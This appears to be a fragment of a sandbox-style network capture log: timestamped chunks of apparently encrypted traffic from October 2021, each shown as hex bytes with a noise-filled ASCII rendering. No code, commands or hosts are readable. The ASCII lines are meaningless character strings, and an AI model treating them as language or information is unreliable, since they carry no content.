                                                                          2021-10-13 14:18:11 UTC20INData Raw: 4c bb 7f bd af 2e e8 60 fa 62 c0 7f 73 c7 0c 90 eb 24 66 5b aa 49 c2 0a fc 8d d7 ff f8 28 82 9d 09 35 0e 5c 57 db e6 ac 21 db 48 d6 aa 1b 73 3c 20 90 50 72 a4 1c 5a 50 50 1a b8 2e 62 14 56 85 22 f5 f5 63 4e e9 30 d0 f9 c0 dd 3b 09 ec 22 86 63 0a 47 c2 92 6a c8 45 fb 08 33 3e 15 3e 6f 45 60 71 66 81 4c d4 4f fb ba 45 58 38 65 b5 44 8b 1b e8 0c a2 e0 d6 da 96 e2 1e cf 87 ea 19 d0 b4 8d 15 e9 0f f9 14 2f 20 a8 50 d5 22 7d 58 78 6f f6 b4 af 1a e5 03 d4 dc 3a 1b 7d 5d 51 0a 37 ef e6 b3 27 ab 92 62 e5 0f 55 f7 85 1d e5 2a ca 7f d2 05 05 04 52 96 e2 e4 bc 34 ba 49 83 4c 9e 2f cb c2 c6 f7 93 43 06 5d 86 86 08 da f4 5e 6c d3 24 39 1c 08 45 c8 20 e3 4f a6 f8 52 bc 83 65 60 45 77 26 b7 4b 04 07 2b c1 22 04 fb bb b9 c3 24 4d 91 8d cd 7c 66 c2 11 3a a2 d1 83 bf 70 31
                                                                          Data Ascii: L.`bs$f[I(5\W!Hs< PrZPP.bV"cN0;"cGjE3>>oE`qfLOEX8eD/ P"}Xxo:}]Q7'bU*R4IL/C]^l$9E ORe`Ew&K+"$M|f:p1
                                                                          2021-10-13 14:18:11 UTC22INData Raw: be a2 7d 19 e2 73 b3 a2 12 69 97 f2 6e 88 a8 5b 6b ef 16 20 a7 f9 ac 9c 57 ed 40 ba d2 ba ad cc 0a bd c4 fc 36 fd 0b 04 b6 94 5b 5a a2 d1 74 24 88 4f 03 46 71 85 db 3c 60 b1 91 1e 7a 48 3e bd 48 4f 8a ed 3e 24 64 b7 6b 04 26 04 c0 a4 5b 17 42 5c 8e 03 dc 15 08 e5 b3 6c 09 87 99 b4 e7 6f ca 74 43 23 20 cb dc 88 55 dd 86 ff dc a7 47 e8 ac 28 10 02 09 2a 99 69 e6 34 95 84 39 c7 c6 53 95 ea 90 55 c7 c8 ba eb 09 45 ec d0 1e cc fd 2b bc 9f 41 5c 4e 88 a3 e6 c5 53 47 a5 30 f9 d7 f4 c9 81 6e 15 4d 56 6e d3 ff 8f cd d7 34 9b 73 b7 6f 18 e2 83 ab d6 cc e2 ff 91 60 e7 e4 d2 02 60 8a c2 a3 df 35 4f 0c bc f6 e5 4b 5a cd 0c b9 f7 9f 00 08 f9 13 0e a9 97 b8 3a eb 5a 9e d8 cc ba 0d b9 5e 9a c2 77 0f 45 d0 77 d5 44 6f 04 7f 44 9f 4a 9c b8 de ad 48 d1 21 cb ef 0f c1 3f d8
                                                                          Data Ascii: }sin[k W@6[Zt$OFq<`zH>HO>$dk&[B\lotC# UG(*i49SUE+A\NSG0nMVn4so``5OKZ:Z^wEwDoDJH!?
                                                                          2021-10-13 14:18:11 UTC23INData Raw: a4 5f a0 3a 21 d0 ea d8 dc fe 28 0a 99 10 cb 28 70 58 dc 8e 9a 25 e3 cc 58 1d 0c a9 20 28 9d bd 77 88 0e 46 59 aa 1b 85 2f 52 ad 4c ba 21 fc ec fd 5d 0b 22 f8 ea af fb 22 f7 e9 26 7c 75 06 57 be fb 6a d9 4b ec ef 21 16 10 38 41 4c 8d 74 4a 93 50 dd b5 fa 87 44 65 8d 7f 8a 43 9c 19 e8 14 4d e5 e7 2d bf fd 1c e4 88 df 6c 3c 4f 72 0c fa c5 0b 1d 0a 0f d9 c0 47 dd 6b 78 7a 00 06 af 9f 14 c9 9d ce cf 3e 34 6c 59 56 dc 7e c3 e5 a2 b4 8f 92 73 e5 6f 8f f6 a9 1b e2 11 8c 27 2d fa fe 1b 76 58 90 c9 b5 ba 09 f5 b0 4c 85 03 e3 88 dd c7 91 6e 84 82 d5 81 20 da df 51 3a 29 26 39 1e 1a 05 00 5f c6 49 b5 fb a2 11 95 54 68 41 6d 37 b0 33 32 02 f6 f6 4a e4 fa 93 f6 d5 da 4a ed 88 8d 97 62 d4 ef 45 cf fd b3 aa 5f b1 5f 2d 6d bd fd 4a c6 78 20 cb c8 3c 5a 00 83 80 d3 f1 b3
                                                                          Data Ascii: _:!((pX%X (wFY/RL!]""&|uWjK!8ALtJPDeCM-l<OrGkxz>4lYV~so'-vXLn Q:)&9_IThAm732JJbE__-mJx <Z
                                                                          2021-10-13 14:18:11 UTC24INData Raw: 20 be 07 a9 6d af e9 68 59 d2 a5 d3 d7 f7 c1 cc fa 59 81 23 08 bf 9e 47 7e 86 d9 6b 27 f6 46 2f 51 0b 50 16 3e 64 cf 8b 01 03 7f 0f e7 40 4f 80 69 1e 29 67 b3 72 26 0e 04 c8 b1 d1 e1 43 70 80 c2 fe 02 08 e5 b0 78 6c bf 8c ca e7 79 34 71 47 2f 34 c7 da a8 6e cf 78 f4 70 ad 6c ed 90 85 7f ff f6 00 80 46 99 07 47 fa 31 c7 ec 57 bd f4 91 7d 3e e0 9e e1 66 7b 6c d8 14 a3 cc f6 cf 97 4b 81 ff 97 83 d5 f9 05 78 a5 30 f7 f3 ac e3 7e 68 3d 63 45 6a f9 7f 83 cd d7 bd 3d 26 b5 6e 15 1a fb ab d6 cb a5 e2 90 60 e7 a3 d9 02 60 8a e3 29 68 ed f1 70 b0 e1 ee 50 31 a8 0c b8 fd 83 f7 18 a3 03 10 93 28 b9 2c 13 7d c6 ac 80 ce 71 b9 5e 65 eb 75 f1 44 85 5d f5 e0 6f 0e 13 e1 b6 cd 62 b9 8b 36 31 d5 bb a5 e9 1c c9 43 d3 8b 9e b9 bf b3 63 67 8b 33 84 59 73 ba c9 5c ab 55 4f a9
                                                                          Data Ascii: mhYY#G~k'F/QP>d@Oi)gr&Cpxly4qG/4nxplFG1W}>f{lKx0~h=cEj=&n``)hpP1(,}q^euD]ob61Ccg3Ys\UO
                                                                          2021-10-13 14:18:11 UTC25INData Raw: fa ac 23 fc e7 c5 b1 1b 62 36 3b a5 50 72 a4 11 40 52 5f 32 b8 2b 79 e0 44 ad 3a df ee e2 45 e4 38 cb d5 2f d8 0e e2 c5 1a 82 75 0c 5f c0 9d 7b c1 2e f3 f7 32 18 03 3e 5a 76 60 6e 66 81 53 d1 a6 04 97 6c 79 62 75 bc 96 98 01 f3 0c 4f fa fa c2 a5 ce 00 31 8c cb 0e c1 a1 86 2c fc 12 07 1f 10 3f b0 20 ab 39 7d 43 61 1f 2f 4a ae 3c c2 0f c2 de 2b cd 7f 52 58 de 25 d8 e5 b5 2f b0 87 8d e0 3d a1 e7 a2 05 18 3c f9 1b 3b e9 e1 0c 54 5b f1 de 4b bb 21 70 16 51 a5 29 1d d1 d6 d8 a4 50 9a 5f 97 9d 3f c6 0a 4e 68 1f 0e 2d 1b 02 3c 14 30 e8 58 a5 90 39 a7 83 6f 77 66 39 2a a3 2e 1f 16 30 de b3 e5 d6 b6 bd c4 d1 64 fc 97 cd 76 71 dc f3 28 d9 fd a2 b5 68 7b a3 2c 47 9e ac 41 d7 76 c5 c1 bd 2b 7c 13 9c a8 32 e8 ac 13 1e 9f 16 27 24 87 e4 98 e4 8d 99 16 95 e2 d9 bf f9 ae
                                                                          Data Ascii: #b6;Pr@R_2+yD:E8/u_{.2>Zv`nfSlybuO1,? 9}Ca/J<+RX%/=<;T[K!pQ)P_?Nh-<0X9owf9*.0dvq(h{,GAv+|2'$
                                                                          2021-10-13 14:18:11 UTC27INData Raw: 1a 15 6a 8d 4e 54 b3 d6 43 3c 77 4e 25 42 01 9c d4 26 75 c1 5f c8 69 43 14 88 47 67 91 6c 36 2e 68 a2 7b 14 fc 17 c7 b9 40 e6 6b 61 85 1f 5b 0d 19 ea a8 b1 05 83 97 a5 e0 51 25 74 6f 2b 24 ca cd 8f 50 de 75 28 26 b6 63 ef 85 57 c6 ec f7 00 88 4a e7 25 51 9e ef d4 e3 42 90 ec 48 6a ee 45 91 e1 66 70 ff d4 16 b2 c7 3a b8 83 5a 84 d5 9a a2 e6 ea 78 61 a9 5f ef da f6 eb 47 42 14 47 45 62 d3 f1 0b cd d7 f9 7f 73 b7 6e 16 23 f3 c4 cb cc ca e1 fe 7e ec cc d8 2b 32 80 cb 2b 7b f9 e6 0b a8 f0 e6 72 0e a2 0d be e4 87 0e 75 df 01 0f 81 d6 b8 3a cd 3c c2 8d a0 6a 71 b9 5e 9b 1a 5c 56 6d 4b 5f d5 4f d8 19 c5 92 9c db 9c b9 c7 09 4a c5 26 c9 ee 70 eb 2c df 8a 9e b3 d0 94 22 3c a9 04 95 5a 79 94 86 c0 ab 5f 41 ad 5b c5 e3 24 51 8a 8f 83 48 a1 c8 47 84 d3 c2 45 cb 4e 80
                                                                          Data Ascii: jNTC<wN%B&u_iCGgl6.h{@ka[Q%to+$Pu(&cWJ%QBHjEfp:Zxa_GBGEbsn#~+2+{ru:<jq^\VmK_OJ&p,"<Zy_A[$QHGEN
                                                                          2021-10-13 14:18:11 UTC28INData Raw: 32 28 28 79 ec 41 24 22 fc fd f8 51 e1 37 fc 5a d1 d9 28 ef 61 31 83 75 07 75 e2 97 6a d3 56 6a c9 32 12 11 01 f6 5b 73 7f 4e ca 48 ce bb ed 40 cd 58 73 7e a7 53 8c 1b ea 00 74 f8 f9 d3 b8 c9 93 c8 8d e7 01 d0 bb 9c 0f fb 02 00 b7 12 3a b8 29 34 1d 7d 52 7b a2 17 bf bc 1c d8 12 dd db 26 96 43 59 47 f5 25 ce f4 a9 22 b8 0e 62 ec 06 bd 6a b8 12 d9 07 55 04 2d f0 dc 1d 48 56 7e c0 aa ab 01 6d 9d 72 a5 2f cb c8 0d d5 97 43 9a 77 92 86 20 d0 dc 7b 45 0a 2c 4d 08 02 36 0d 32 e4 58 b2 ee 2b 28 34 7d be 7f ba 44 95 34 1f 0d 38 cd 5c ec ee 93 a5 d6 da 4a f8 1b ca 7c 62 d5 fc 37 d3 f1 a5 bf 72 76 4c 2d 6b 9f 1f 5b ca 61 18 c3 bd 20 4e 17 0a 87 23 f3 b2 24 ed 8f 37 25 1b 0f f4 95 c6 2c 88 1d 8e f7 bb bc 68 82 81 12 4e b9 b2 58 30 03 99 d4 73 59 74 eb cc bb a3 77 dd
                                                                          Data Ascii: 2((yA$"Q7Z(a1uujVj2[sNH@Xs~St:)4}R{&CYG%"bjU-HV~mr/Cw {E,M62X+(4}D48\J|b7rvL-k[a N#$7%,hNX0sYtw
                                                                          2021-10-13 14:18:11 UTC29INData Raw: d7 98 3d 6c 52 3e 8b 49 4f 8a 7c 33 32 75 97 62 11 32 2c da ba 51 e3 52 52 95 3b 3e 27 09 e5 b8 76 34 9d b6 db c7 78 34 7f 7e 03 20 a8 f5 81 4a c5 69 dc e9 ca 46 ec 94 52 ff df 99 2b 83 59 e8 25 5a 92 28 c3 62 e4 fa d7 93 7d 32 db 9f fe 26 fc c7 d0 14 a2 db 0a ad b0 54 a9 ec a9 b5 f9 a0 53 62 a4 30 f9 a8 d3 e0 7e 64 06 61 54 4c e2 de e4 ef d6 b9 ea 60 90 7f 32 1a e7 aa d6 c7 e2 bc 93 60 eb e4 fc 01 60 86 a4 55 68 ed fd 0c 91 e7 ff 5c 4f 8a 62 82 f6 95 03 c7 f0 10 29 ad d1 a9 1c 82 2b 99 ae aa b6 76 b3 80 82 ed 69 d1 50 dd 55 0b 54 4a 26 24 1f b7 d1 8f 91 fc 22 5b d7 3d 04 e9 1b e2 2a f5 cb e2 b3 d0 b6 62 67 81 af 94 5a 73 9d a6 c1 ab 80 45 85 4c d7 e3 22 3e 93 8e 83 42 8f da 56 80 35 d1 43 d3 47 d1 8d ba 36 c9 1b d2 d9 09 cf 98 2e de c0 cd 3e 59 06 be 5b
                                                                          Data Ascii: =lR>IO|32ub2,QRR;>'v4x4~ JiFR+Y%Z(b}2&TSb0~daTL`2``Uh\Ob)+viPUTJ&$"[=*bgZsEL">BV5CG6.>Y[
                                                                          2021-10-13 14:18:11 UTC31INData Raw: df d2 0f 83 7f 0d 47 c2 99 6a c8 4e f9 fa cc 13 3c 54 51 8b f2 75 66 91 60 da b1 fa 9c 68 6f 70 7e a0 5b 06 0d ec 14 5d f2 f1 c2 b5 c7 19 e7 9c e7 00 c9 12 9c 0f fa 0c 3f 99 3c 31 af 3e 1a 33 76 4a 6b 09 a4 a5 a4 09 df 92 f6 cf 3e 1a ce 48 4c ee 2c 4f da a4 34 ae 30 62 ea 02 a1 e7 a3 0b da 34 7f 2b 2d fa fb 1f 49 51 e2 fa a2 26 1c 77 10 4c 28 3e c7 da ca 5b 86 4f 98 49 1a 97 2c c0 e2 d3 55 06 31 11 bd 02 36 1c 07 fc 44 a6 f0 2c b7 8c 7a 76 97 27 1b 9a 24 1a 1d a7 fa 4d e4 fb 93 0c d5 da 46 f8 1a f2 7c 62 d5 c7 88 c2 fd b9 86 2d 5e 5d 27 7c 43 30 61 c6 72 12 c1 b2 2b 49 13 88 a8 32 fc ac 39 1e 9f 16 3d 1d 99 f3 02 c6 9e 88 1d 8e ed a9 a5 eb a1 8a 12 4a b0 33 8e 20 2f b2 dc 48 6c 01 f9 c6 b2 90 e6 03 ef 2f b9 9d 71 a6 c4 b3 39 de b2 77 89 5e ce fa 97 41 f2
                                                                          Data Ascii: GjN<TQuf`hop~[]?<1>3vJk>HL,O40b4+-IQ&wL(>[OI,U16D,zv'$MF|b-^]'|C0ar+I29=J3 /Hl/q9w^A
                                                                          2021-10-13 14:18:11 UTC32INData Raw: c1 ad af e8 6f 72 93 12 51 09 17 ec 4c 66 3a 8e be b1 d7 07 cb 8a 90 36 3c ec d6 82 4f 85 e9 e1 fd 8b 6e fb 9f 5d cb b7 e1 d6 d6 5c a8 3c 60 f6 c6 38 13 45 bf fb 81 4d 3a c8 87 e1 66 71 af d0 14 b2 de 27 97 ba 4b 89 ea 76 a2 ca e2 63 7c a5 38 eb 25 f7 cd 73 10 22 47 45 6e 80 b4 8a cd dd b2 f9 7f b7 66 03 cc fe 87 d4 da c6 eb 99 79 13 cd fe 01 4b 82 e0 e2 6f ef 98 53 b8 e0 e4 70 5e a2 0d ab c7 97 09 4c fc 01 0f c5 d6 b8 2b fb 70 b2 e3 a0 62 66 47 5f b7 e8 7b 03 45 d2 47 2b 44 43 02 11 0d b6 f3 d1 b9 d4 10 76 c3 2e d6 e9 14 d1 d2 de a6 9a aa fa ae 6e 67 89 01 6a 5b 5f b1 a1 ae e5 54 45 8f 54 f5 fb 35 14 88 82 83 4a 9b 24 57 ac c0 c6 4f d3 6e ca 73 bb 02 ca 30 d0 e3 b8 d5 b2 2e de c0 d6 0c 5b 06 88 5c ed fc dd 4b f5 3e 08 86 f9 ce 25 b2 33 20 d0 9e 0d 3a 1d
                                                                          Data Ascii: orQLf:6<On]\<`8EM:fq'Kvc|8%s"GEnfyKoSp^L+pbfG_{EG+DCv.ngj[_TET5J$WOns0.[\K>%3 :
                                                                          2021-10-13 14:18:11 UTC33INData Raw: 56 7a 63 7d 0c 41 d9 b3 4e 0a 49 6a 70 ca 3a 46 9d 03 f6 13 74 f3 fb d3 b4 d8 17 41 3a ff da c6 dc ae 04 ed 13 07 15 03 41 ef 64 90 b3 7d 52 70 b4 9a bd a6 9e 7e 09 13 ca 1e 1b 6d 59 47 a9 82 5f ec 8e 34 af 92 60 d1 14 ab 7f a9 1f ce 67 f2 04 3c d2 6d 0c 45 4a ec 83 2d ba 0d 71 0a 53 3a 98 eb 3d dd c7 97 72 8a 77 a7 85 20 dc 87 18 45 0a 2c 43 32 95 36 16 2b e0 26 2d ff 2c ac 8f 6d ea de 06 c8 b0 35 1f 36 20 ed 6c e7 fa bd cc 82 db 4c e5 ec d4 75 ec 63 39 33 4c 4a 65 b9 ad 49 8b a0 40 95 bd 4b cc 74 05 c5 2a 32 4d 09 09 1f 97 6f ba 21 e6 86 33 bd bb bb f7 99 ee 85 8e 05 8d 68 01 7c f0 20 3d b7 d9 a7 3e 76 38 0a 17 69 b6 54 8e 4e e4 a9 b9 7a 09 e9 0f b6 99 5b 9d b4 bb 39 e7 b1 5f c9 16 ce f0 97 5f c9 ee 09 cb 39 07 57 de f0 ef fd 36 4c f1 28 1a 53 bb ce 0a
                                                                          Data Ascii: Vzc}ANIjp:FtA:Ad}Rp~mYG_4`g<mEJ-qS:=rw E,C26+&-,m56 lLuc93LJeI@Kt*2Mo!3h| =>v8iTNz[9__9W6L(S
                                                                          2021-10-13 14:18:11 UTC34INData Raw: cd 08 e1 3e 1c 9a 3d 58 5f 8b ab 5c 2c 4f c6 e8 c7 14 d3 49 00 4a 63 1b 13 0a 29 06 f3 ed 87 e2 4b ad 8b af 88 3d f9 7a f1 73 cf 8a fc 5c 61 12 ee 1c 13 b5 41 d9 03 20 fc 87 e9 61 24 3e 0a 89 7c 0e 29 5c 56 e6 fc ae 31 96 f3 d6 aa 1a 1c 7a 24 87 a4 af 99 19 45 55 53 94 1e 45 d0 ea 57 a3 0d cd fe f9 43 e6 26 c5 fc d4 da 2c f3 c5 6e 82 75 0c 50 f9 01 6a d9 4b ef 99 aa 12 10 23 56 5f 62 73 77 94 5e df b5 74 21 2f da 73 7e ac 51 8d 0e fa 10 d2 56 95 7a be d1 14 e7 d6 e6 00 c9 98 a0 07 ed 15 01 3d 31 32 af 39 90 05 7d 52 70 6f 9e b4 af 1a da 19 d8 c9 2f 1c 7a 48 40 7a 81 ac 4c a4 34 a5 83 75 8e 6c ab f6 a3 0b dd 26 e3 0c 42 a8 fa 0c 4f 53 e7 fd bc d5 59 7b 07 50 a7 20 da cd ae 92 97 43 8b 4c 8b 97 2d b5 a2 4f 44 00 35 37 c4 30 13 3e 16 e3 49 bf ec 3c b7 8a 49
                                                                          Data Ascii: >=X_\,OIJc)K=zs\aA a$>|)\V1z$EUSEWC&,nuPjK#V_bsw^t!/s~QVz=129}Rpo/zH@zL4ul&BOSY{P CL-OD570>I<I
                                                                          2021-10-13 14:18:11 UTC35INData Raw: f3 fe 84 19 a7 74 d1 61 5a 08 57 de 38 b8 83 f6 07 80 8f a2 6d e1 72 69 c6 ed 69 a6 03 44 01 6a 96 68 7f 19 e4 5b 58 a0 1c 6f a2 e2 6e 82 a2 51 76 e3 0d 18 ba 07 2a b0 44 eb 25 59 d0 ab bf ef 9d de c5 fa 53 89 78 66 bd 9e 4b 5b ab d1 63 29 19 58 2e 51 05 e2 43 3c 64 c5 e6 3c 7b 4c 1c 8a 4e 3c a6 6c 36 2e 77 b6 65 0b 3b 02 a7 9c 50 e9 49 61 81 07 3e 29 09 e5 b8 76 13 94 fa 9e ee 79 3e 76 47 47 36 c7 d6 93 4e de 7d 91 db a4 6c e7 87 5f ff fa e7 04 94 48 e6 ba e9 eb 15 c6 ec 59 9e 25 88 6c 3d a7 de e0 66 7b e5 bf 71 a2 c8 21 60 4b 41 88 d1 8e aa 89 b7 7b 70 af ec fb dc 99 f7 7f 6e 1f 6d 45 6b ef ff 8b cf d7 f2 e0 69 d2 6e 1b 32 ff ab d6 cf ca e5 91 07 98 cc d8 03 60 80 cb 36 58 e9 f7 9e b9 e0 ee 17 5e a2 1c ac fc e6 68 18 fc 0b 03 f2 b4 b9 3a e7 71 90 a6 a4
                                                                          Data Ascii: taZW8mriiDjh[XonQv*D%YSxfK[c)X.QC<d<{LN<l6.we;PIa>)vy>vGG6N}l_HY%l=f{q!`KA{pnmEkin2`6X^h:q
                                                                          2021-10-13 14:18:11 UTC36INData Raw: 58 0c 60 06 33 84 0a 36 02 f1 e0 e8 6b 4c b2 8f 42 82 00 c7 7a fc 60 d9 0d 62 eb 0e b9 81 6f 18 a4 5f 9e b0 21 fc 87 e1 e2 ff 0e 0a 99 22 3f 50 4c 57 ca f2 ce 35 e3 c8 d4 b9 1e 61 28 5f d1 ae 73 8c 9b 2d e5 54 1a af 35 76 f9 50 a9 34 fb e5 07 44 d9 24 d7 ef e2 c7 3b e4 ea 0e 92 72 10 a3 d0 ba 69 ce 52 e1 f6 23 15 0f 26 bb 5a 5f 77 4d 95 70 aa 4f 05 69 3e 01 72 7e ac 68 fe 0b ec 1e 5f e5 ff fb 28 d1 1e c9 a7 e7 1b f3 b5 8d 63 ed 13 07 45 03 31 be 29 b2 20 62 5f 78 7b 52 b4 af 14 e1 3f c9 cf 34 74 1a 58 47 fe 20 59 cd d3 35 af 98 7f f3 13 83 8e a8 1f c4 07 e2 05 2d f0 ec 24 d0 40 ee ea 9d aa 0c 7b 0d 27 e1 2f cb c6 df bc c2 43 81 5b f8 f4 21 da fe 67 3d 0b 26 33 36 00 e8 0f 27 f4 9f bf f9 33 ac b2 c9 ba 67 03 1f 87 35 1f 0d 20 ed 75 e4 fa b1 61 d5 f0 4c ee
                                                                          Data Ascii: X`36kLBz`bo_!"?PLW5a(_s-T5vP4D$;riR#&Z_wMpOi>r~h_(cE1) b_x{R?4tXG Y5-$@{'/C[!g=&36'3g5 uaL
                                                                          2021-10-13 14:18:11 UTC38INData Raw: 88 6d eb 1c 4f c7 ed 61 a0 52 3a 1a 32 9c 09 00 18 e4 51 49 a7 39 0c ea 8d 46 08 a3 51 7c ef 10 20 d1 1a ac b0 4e e6 61 71 ff ba ab ee c3 bd ef b3 50 ad b8 04 bc 98 52 52 b3 dd e5 9a 60 7f 15 40 0b 9e d2 2a 77 c7 a2 37 6b 45 07 91 d2 5c 86 7c 30 23 4c 97 74 0e 20 17 cd aa 54 c1 72 70 84 15 7d 09 19 e0 ba 6e 3e 3d 95 b4 e9 68 3c 62 b9 32 3f d6 d4 91 43 41 cf cc 3f b7 6b c5 15 59 ee f7 db 94 5c 57 f0 33 a0 92 2d c7 ec 48 fa ac 92 7d 32 14 90 e1 66 70 fc d0 14 a1 c8 d5 be e8 30 82 f3 88 a3 e6 e0 60 40 a0 30 c5 db f6 e1 2d 6e 15 56 6d d5 f2 ff 8d c6 d0 a7 9e 10 b7 6e 11 1a d1 a9 d6 cb e2 c5 93 60 eb a3 15 02 60 86 cc 56 66 ec f7 1b cd ad ee 5a 5f a8 d3 b2 f0 b9 0f 1e 93 56 0f 81 dc 64 3c c7 7c 99 af b0 6a 71 bb 5e 9d ea 47 25 45 d0 5f d5 45 6f 15 23 1b b7 d7
                                                                          Data Ascii: mOaR:2QI9FQ| NaqPRR`@*w7kE\|0#Lt Trp}n>=h<b2?CA?kY\W3-H}2fp0`@0-nVmn``VfZ_Vd<|jq^G%E_Eo#
                                                                          2021-10-13 14:18:11 UTC39INData Raw: ff 6b fa 65 d8 81 08 6b 0e ae f4 1c 19 a5 46 86 c7 20 a6 8c c4 cf ad 28 1b 8c 1f 26 2c 64 11 cb f0 bf 25 f2 cd c9 a1 e5 72 01 31 81 a6 5b 96 1c 42 45 7c 3e a9 2a 73 85 9b a9 25 f6 e2 f5 56 f0 23 c5 fc cd 27 23 db e6 0c ab ff 07 5d db 85 6e c4 52 e3 f6 23 17 0e d7 44 77 7a 4d 81 90 48 ce ae f3 85 45 73 62 7b b9 4e 75 0b c0 1d 64 1a fa d3 be ce 11 dc 88 e7 11 c6 a9 73 05 c1 07 01 17 2b 6e ac 3f be 0a 59 52 7a 0a 69 78 af 10 c3 04 da ca 3e 0a 69 46 4d 0a 37 ef f1 ac 1c cf 91 73 e7 7e 36 f6 a9 15 f7 a4 f2 04 2d e5 f1 1f 40 40 ff e9 a8 44 0c 57 02 4c b9 31 d8 c7 dd d6 92 58 7f 5e aa 8d 22 f2 db 4f 44 00 0a 11 06 11 33 16 30 e6 53 4b fe 00 b2 85 67 4c 77 25 37 b6 1d 3b 07 2b cf 22 28 fa bb b5 ce c9 49 ef 87 c8 63 6d 2a ee 17 c9 eb 3e bb 77 5e 5c 07 74 85 ae 4f
                                                                          Data Ascii: kekF (&,d%r1[BE|>*s%V#'#]nR#DwzMHEsb{Nuds+n?YRzix>iFM7s~6-@@DWL1X^"OD30SKgLw%7;+"(Icm*>w^\tO
                                                                          2021-10-13 14:18:11 UTC40INData Raw: 4c 3c 03 67 f3 88 77 8f b4 4e 7a cb 04 29 be 0d af 3e f3 f4 78 83 c7 6c 26 cf ee bf c5 f6 5b 9a 04 0c aa 9c cf e1 bd d6 b1 05 64 4f 2f 5b 7c 1a da 3c 62 dc 8f 01 6a c1 3d 99 48 4e 93 68 3e aa d3 a2 71 80 9d de df 61 46 3f ce 5b 84 1f 50 0d 00 ed 3c d0 09 9c 4f a5 ea 6f 2b 65 47 33 36 c7 d6 88 5c c6 6e f6 7e 12 7d e8 1a ef 34 d5 e4 01 82 53 ca a3 5e 84 33 d6 ea 50 92 ef 9b 6c 3d a7 22 e0 66 77 83 c6 15 a3 c2 38 b8 84 4f a9 61 88 a3 ec ea a5 61 80 18 c4 db f6 eb 6d 69 01 4d 6d 52 f3 ff 81 13 d7 bf ca 73 b7 6f 05 32 ff ab d6 9b ca 6e 4a 60 fc d6 d2 03 61 9b fb 29 68 d0 f7 1f b9 c0 ee 5a 4f a0 21 b1 f5 fa c0 19 fc 0b 19 b2 d4 ac 10 c5 eb 99 ae aa 42 36 b8 5e 91 e8 0c 97 45 da 55 c1 53 47 9c 12 1f bd b4 8a b9 d4 10 51 09 39 f2 de 1c c8 26 cb 80 b6 8b d0 b4 68
                                                                          Data Ascii: L<gwNz)>xl&[dO/[|<bj=HNh>qaF?[P<Oo+eG36\n~}4S^3Pl="fw8OaamiMmRso2nJ`a)hZO!B6^EUSGQ9&h
                                                                          2021-10-13 14:18:11 UTC41INData Raw: 84 d8 43 c5 28 1b 9c 1f 1d bc 5d 57 c0 dc a1 34 e7 d0 5a 95 1b 73 2c 32 af 3b 72 88 15 6e 4d 84 53 a9 2a 7b c2 43 a9 25 f6 ee fe 6e f9 f3 9e f9 d1 db 0a e3 ed 0e 89 66 01 4b c2 9e 14 ab 40 e6 fc 21 1b 06 3b 4d 49 7a 5d 05 90 48 c8 3d c5 96 40 72 60 78 b7 46 a3 50 ec 14 56 f7 d4 d4 b8 da c3 5f 89 e7 00 d2 b9 81 77 7b 12 07 1f 10 3b be 35 aa 0b 55 3d 79 00 00 9c 38 11 c9 14 d8 e6 16 6b 6f 59 41 9b ae c2 e5 ae 25 a5 80 5a c9 60 a8 f6 af 37 59 2e f2 0e 3c d3 d2 7e 46 40 e8 83 2d bb 0d 71 16 50 a6 06 e3 b1 de c7 91 6b 16 5e 86 8c 31 f3 dc 3b 47 0a 20 56 82 03 36 1c 30 e9 5b 9c d7 59 a5 83 63 4c fe 27 37 ba 24 36 2f 5d c6 4d e2 95 23 be d5 d0 5d e5 84 e4 54 15 d7 ef 3d ea 6a b2 ae 7d 4f 74 05 13 96 bd 4c a9 ea 12 d2 bc 25 50 12 ae 80 5a f0 b3 31 c8 09 3b 33 06
                                                                          Data Ascii: C(]W4Zs,2;rnMS*{C%nfK@!;MIz]H=@r`xFPV_w{;5U=y8koYA%Z`7Y.<~F@-qPk^1;G V60[YcL'7$6/]M#]T=j}OtL%PZ1;3
                                                                          2021-10-13 14:18:11 UTC43INData Raw: eb 68 48 d0 ba ab cd eb bf c4 c0 5c 85 0b 0b bc 9e 41 4c a2 d9 6a 3e 46 49 2f 42 0c 8d db 5c 64 cf 98 08 69 46 2e 9a 4b 4f 80 6d 27 2e 7b a8 8a 0f 06 09 d9 b3 22 4a 42 70 8e 0c 56 1f 14 f6 b8 67 07 86 88 4a ee 55 3c 4d f8 20 37 c7 c2 93 40 cf 69 f4 ef b6 92 ec b8 51 d6 29 f4 00 82 46 f6 27 54 84 28 cd f4 ad 94 d7 8b 7f e8 83 ba e1 64 59 f8 d0 14 a9 e0 5f bd 95 41 a9 ec 88 a3 ec ec 62 63 af 30 e2 d1 e9 f0 80 6f 39 4e 7d cb f1 ff 8b d2 c5 aa ea 73 a6 64 0a 2a 01 aa fa d6 cc 3b db 60 ed cd fa 17 60 80 c1 05 1c ec f7 15 91 f1 ee 5a 54 b1 08 a7 ee 86 03 19 ed 0b 10 9c 28 b9 16 e4 44 f2 ac a0 6a 6e a7 4d 91 ea 72 05 5a c0 a1 d4 69 63 08 3b bb b6 db 96 ab dc 05 40 c4 3d da f8 16 d4 d2 de a6 dd a2 d4 9c 38 67 81 11 d1 57 73 bc a6 dd aa 55 45 45 4d c6 e3 67 3e 93
                                                                          Data Ascii: hH\ALj>FI/B\diF.KOm'.{"JBpVgJU<M 7@iQ)F'T(dY_Abc0o9N}sd*;``ZT(DjnMrZic;@=8gWsUEEMg>
                                                                          2021-10-13 14:18:11 UTC44INData Raw: aa 1b 73 2d 24 87 db 06 88 0a 58 43 54 1b b2 1a 7d ea de a8 25 fc 9e f9 45 e4 3c c8 d1 6a d9 22 fd c5 80 80 75 00 75 f5 96 6a d3 4c ef de 8b 12 10 2f 4e 28 c9 75 66 9a 42 c9 de 29 96 40 79 60 71 b0 53 85 32 a1 15 5c e1 eb dc af df 84 dc 89 f6 04 eb 81 8d 04 e7 3e 02 2d 31 30 af 3f a9 26 0e df 7b 00 00 a7 a8 ce db 3b e1 f8 3e 1b 66 4a 4f dc 0e c3 e5 ae e9 ba 93 73 e1 00 ac de c5 1c ce 29 9d 83 2c fa fc 21 40 78 ec ed b5 ba 1c 7f 2f d1 b5 2f c1 ad 53 c6 97 49 ee d3 87 86 2a f2 42 4f 44 0c 35 3c 64 91 36 16 2b f0 4f a3 ee 2b c9 0b 64 64 6f 31 ed a3 25 0c 0e 13 02 4d e4 fa aa b8 c4 d3 64 8e 95 cd 7a 0d 5e ee 3b c4 ee b9 bf 70 4f 54 05 09 96 bd 4c a9 f8 12 d2 b0 27 51 11 81 bc dd f2 a2 31 9e 0d 3a 33 06 85 cd b6 ee 8f 82 0b 7a e7 d6 86 dd bf 8f 2f 64 87 6f 71
